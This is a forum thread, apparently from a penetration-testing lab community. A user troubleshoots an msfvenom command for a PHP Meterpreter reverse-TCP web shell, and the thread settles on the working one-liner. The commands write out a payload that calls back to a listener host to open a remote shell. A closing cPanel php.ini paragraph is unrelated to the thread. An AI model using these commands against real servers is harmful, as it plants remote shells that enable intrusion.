I get the following error when I try to create a msfvenom PHP web payload on Kali Linux (rolling, 2021.1):
└─$ sudo msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.10 LPORT=7777 -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >> msf_shell.php
Command ‘pbcopy’ not found, did you mean:
command ‘bcopy’ from deb bacula-sd
Try: sudo apt install
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34277 bytes
No payload is created, just the shell.phpcat file, as the command fails as soon as it hits pbcopy.
I installed xclip as an alternative for copy/pasting to clipboard, and attempted the below, and this does complete the command, but as far as I can tell the output file is corrupt in some way (doesn’t work anyway!):
sudo msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.10 LPORT=7777 -f raw > shell.phpcat shell.php | xclip -selection clipboard && echo '<?php ’ | tr -d ‘\n’ > shell.php && xclip -selection clipboard -o >> msfshell.php
I’ve also tried doing the original command manually, in stages, but no luck. Anybody else getting this, or see where I’m going wrong?
The error message is saying you dont have
Have you installed it?
Unless I’m badly mistaken, pbcopy/pbpaste are Mac OSX commands and not available natively for Linux, at least that’s what I’ve read online.
Though in saying that, I’m kind of confused, because I expected to see other people online with the same problem, yet can’t find a single person with the same error…is everybody else able to run pbcopy on Linux somehow? How is everybody else generating this PHP payload on Linux?
Every single cheatsheet I see online for creating a msfvenom PHP web payload uses pbcopy…is everybody just using a Mac maybe?!
The suggested alternative command in the output (bcopy from bacula-sd) doesn’t seem to be related to clipboard copy/paste, it’s just suggested because the spelling is similar.
I’ve never seen pbcopy mentioned and I’ve never seen it in a cheatsheet to use it. But then I’ve never tried to create a venom payload like this.
Why not just create the output and copy / paste it into a script if you need it that way?
Got this working, turns out…all I needed was a simple
sudo msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php! No need for anything after that.
A lot of the guides I’ve looked at online mention pbcopy/pbpaste, so maybe they genuinely were using Macs afterall. I had copied one of those guides into cherrytree as my go-to msfvenom guide, so that’s what threw me.
Log into your cPanel.
Go to the File Manager.
Find the “Error handling and logging” section in the php.ini.
Next you can set the display_errors variable to On or Off to either show the errors on your website or not.